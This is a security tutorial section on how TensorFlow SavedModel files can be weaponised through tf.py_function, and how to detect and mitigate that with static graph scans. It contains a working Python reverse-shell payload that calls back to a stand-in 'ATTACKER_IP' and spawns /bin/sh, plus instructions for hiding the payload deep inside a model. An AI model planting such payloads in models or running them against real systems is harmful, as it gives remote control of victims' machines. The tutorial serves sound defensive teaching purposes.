Moving from PyTorch’s `pickle` vulnerabilities, you encounter a different landscape with TensorFlow’s SavedModel format. While it was designed to be more secure by separating the graph definition from arbitrary code execution, it is not immune to exploitation. The attack surface shifts from deserialization vulnerabilities to the abuse of legitimate, yet powerful, framework features designed for extensibility.
The SavedModel Structure: A Deceptively Simple Façade
Unlike a single `.pth` file, a SavedModel is a directory containing a structured set of files. Understanding this structure is key to identifying where malicious code can be hidden. An attacker doesn’t corrupt a single file; they embed their payload within the model’s legitimate architecture.
- `saved_model.pb`: This is the core. It's a Protocol Buffer file defining the model's computation graph, including all operations. This is where a malicious operation will be defined.
- `variables/`: This directory holds the trained parameters (weights and biases) of the model. While direct manipulation is possible for backdooring, it's not the primary vector for code execution.
- `assets/`: For additional files, like vocabularies for text models. It can be abused for storing payloads but doesn't execute them directly.
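Before loading anything into TensorFlow, it is worth simply enumerating what a downloaded model directory actually contains. The snippet below is a minimal sketch; `path/to/downloaded_model` is a placeholder, and the exact set of auxiliary files (for example `fingerprint.pb` or `keras_metadata.pb`) varies by TensorFlow version.

import os

MODEL_PATH = "path/to/downloaded_model"  # placeholder path

# Walk the SavedModel directory and list every file with its size.
# Anything beyond saved_model.pb, variables/, and assets/ (plus the
# optional version-dependent metadata files) deserves a closer look.
for root, _dirs, files in os.walk(MODEL_PATH):
    for name in files:
        full_path = os.path.join(root, name)
        rel_path = os.path.relpath(full_path, MODEL_PATH)
        print(f"{rel_path}  ({os.path.getsize(full_path)} bytes)")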
The Primary Exploit: Abusing `tf.py_function`
TensorFlow provides a powerful, and dangerous, operation called `tf.py_function`. Its legitimate purpose is to wrap Python logic within a TensorFlow graph, enabling custom data processing or integrating with libraries that don't have native TensorFlow ops. For an attacker, it's a direct gateway to arbitrary code execution on the victim's machine.
When a model containing a `tf.py_function` is loaded and executed, the Python code within it runs with the same privileges as the process running the model. The victim believes they are just performing inference, but they are also executing your embedded payload.
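To see the mechanism in isolation, here is a minimal, benign sketch (the function and variable names are illustrative): the wrapped Python function runs inside the host process every time the graph executes, which is exactly the property an attacker abuses.

import os
import tensorflow as tf

def host_side_logic(x):
    # Plain Python, executed in the process that runs the graph.
    print(f"Running as PID {os.getpid()} with full process privileges")
    return x * 2

@tf.function
def graph_fn(x):
    # tf.py_function(func, inp, Tout) inserts an op that calls back into Python.
    return tf.py_function(host_side_logic, [x], tf.float32)

print(graph_fn(tf.constant([1.0, 2.0])))  # the wrapped Python function runs here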
Attack Crafting: Embedding a Reverse Shell
Here is how you would construct a simple, malicious layer using tf.py_function. This layer, when called, attempts to establish a reverse shell. It can be hidden within a larger, legitimate model architecture.
import tensorflow as tf
import os, socket, subprocess

# The malicious Python function
def reverse_shell_payload(x):
    # This code executes on the victim's machine
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('ATTACKER_IP', 4444))  # Connect back to attacker
        os.dup2(s.fileno(), 0)  # stdin
        os.dup2(s.fileno(), 1)  # stdout
        os.dup2(s.fileno(), 2)  # stderr
        subprocess.call(['/bin/sh', '-i'])
    except Exception:
        pass  # Fail silently if connection fails
    return x  # Pass the tensor through, appearing benign

# Wrap the payload in tf.py_function
@tf.function
def malicious_op(tensor_input):
    # The third argument (Tout) defines the output type
    return tf.py_function(reverse_shell_payload, [tensor_input], tf.float32)

# Now, integrate this 'malicious_op' into a Keras model.
# It could be an activation function or a custom layer:
# model.add(tf.keras.layers.Lambda(lambda x: malicious_op(x)))
# ...then save the model...
# model.save("poisoned_model")
The key is subtlety. An attacker wouldn’t place this in the first layer. It would be buried deep within the model, perhaps in a part of the graph that is only triggered by specific inputs, making detection during casual inspection more difficult.
Detection and Analysis for Red Teamers
As a red teamer, your goal is to find these hidden threats before they execute. Your analysis should focus on inspecting the model’s graph structure *before* running it.
Static Graph Inspection
You can programmatically load the model's graph definition, without running inference, and check for the presence of dangerous ops. The op that `tf.py_function` inserts into the graph is typed `EagerPyFunc`; the related `tf.numpy_function` and the legacy `tf.compat.v1.py_func` produce `PyFunc`.
import tensorflow as tf

MODEL_PATH = "path/to/downloaded_model"

try:
    # Load the model object and graph metadata; this does not run the inference signatures
    imported = tf.saved_model.load(MODEL_PATH)

    # Get the concrete function for inference
    # 'serving_default' is a common signature key
    concrete_func = imported.signatures['serving_default']

    found_pyfunc = False
    # Iterate through all operations in the graph definition
    for op in concrete_func.graph.get_operations():
        if op.type in ("PyFunc", "EagerPyFunc"):
            print(f"[!] DANGEROUS OP DETECTED: {op.name} (Type: {op.type})")
            found_pyfunc = True

    if not found_pyfunc:
        print("[+] No PyFunc operations found. Model appears safer.")
except Exception as e:
    print(f"[-] Error loading or inspecting model: {e}")
This script acts as a basic scanner. A positive hit is a major red flag that requires manual investigation or outright rejection of the model.
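If you prefer not to call `tf.saved_model.load` at all (it reconstructs the saved object graph, even though it does not run the inference signatures), you can parse `saved_model.pb` directly with TensorFlow's protobuf bindings. The sketch below assumes a standard SavedModel layout and also walks the nodes inside serialized function bodies, which the signature-based scan above can miss; `PyFuncStateless` is included as the stateless variant of the same callback mechanism.

import os
from tensorflow.core.protobuf import saved_model_pb2

MODEL_PATH = "path/to/downloaded_model"  # placeholder path
SUSPICIOUS_OPS = {"PyFunc", "EagerPyFunc", "PyFuncStateless"}

saved_model = saved_model_pb2.SavedModel()
with open(os.path.join(MODEL_PATH, "saved_model.pb"), "rb") as f:
    saved_model.ParseFromString(f.read())

hits = []
for meta_graph in saved_model.meta_graphs:
    graph_def = meta_graph.graph_def
    # Top-level nodes plus the nodes inside every serialized function
    nodes = list(graph_def.node)
    for func in graph_def.library.function:
        nodes.extend(func.node_def)
    for node in nodes:
        if node.op in SUSPICIOUS_OPS:
            hits.append((node.op, node.name))

if hits:
    for op_type, name in hits:
        print(f"[!] DANGEROUS OP DETECTED: {name} (Type: {op_type})")
else:
    print("[+] No Python-callback ops found in the serialized graph.")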
Identifying Risky Operations
While PyFunc is the most direct vector, other operations can also introduce risk, especially those that load external modules or execute non-standard code.
| Operation Type | Associated Function | Risk Level | Description |
|---|---|---|---|
| `EagerPyFunc` | `tf.py_function` | Critical | Executes arbitrary Python code. The primary vector for RCE. |
| `ReadFile` | `tf.io.read_file` | Medium | Can be used for data exfiltration by reading sensitive local files and embedding their content into output tensors. |
| Custom C++ ops | Loaded via `tf.load_op_library` | High | Loads a shared object (`.so`) or DLL, which can contain any native code. Requires binary analysis of the associated library. |
| `PyFunc` | `tf.numpy_function` (and the legacy `tf.compat.v1.py_func`) | Critical | Similar to `py_function`, but operates on NumPy arrays. Carries the same RCE risk. |
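If it helps your triage workflow, the protobuf scan shown earlier can be extended with a risk map keyed on the table above. The op names and risk labels below are assumptions to tune against your own threat model.

# Risk map derived from the table above; extend to match your threat model.
OP_RISK = {
    "EagerPyFunc": "CRITICAL",  # tf.py_function
    "PyFunc": "CRITICAL",       # tf.numpy_function / tf.compat.v1.py_func
    "ReadFile": "MEDIUM",       # tf.io.read_file - potential exfiltration
    "WriteFile": "MEDIUM",      # tf.io.write_file - potential dropper/persistence
}

def triage(nodes):
    """Return sorted (risk, op_type, node_name) tuples for every flagged node.

    `nodes` is any iterable of NodeDef protos, e.g. the list built in the
    protobuf scan above. Op types missing from OP_RISK that are also unknown
    to your local TensorFlow build usually indicate a custom C++ op requiring
    tf.load_op_library - treat those as High risk and inspect the shipped
    .so/.dll separately.
    """
    findings = []
    for node in nodes:
        risk = OP_RISK.get(node.op)
        if risk:
            findings.append((risk, node.op, node.name))
    return sorted(findings)  # "CRITICAL" sorts ahead of "MEDIUM"

# Example usage with the `nodes` list from the previous script:
# for risk, op_type, name in triage(nodes):
#     print(f"[{risk}] {op_type}: {name}")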
Mitigation and Defensive Posture
Advising a blue team on defense requires a multi-layered approach:
- Strict Vetting: Only use models from highly trusted, official sources. Avoid downloading models from unknown repositories or unverified user accounts.
- Automated Scanning: Integrate static analysis scripts, like the one shown above, into your MLOps pipeline. Any model entering the system should be automatically scanned for dangerous operations.
- Principle of Least Privilege: Run all model inference processes in sandboxed environments (e.g., containers like Docker or gVisor) with minimal permissions. Block all outbound network access unless explicitly required. This contains the blast radius of a successful execution.
- Disallow Custom Ops: Institute a policy that disallows models containing `PyFunc`/`EagerPyFunc` or custom C++ operations unless they have undergone a rigorous security review.
The TensorFlow SavedModel format is a significant step up in security from raw pickling, but its extensibility features create new, more subtle avenues for attack. Your role as a red teamer is to demonstrate that “safer” does not mean “safe,” and that diligent inspection of the model supply chain is non-negotiable.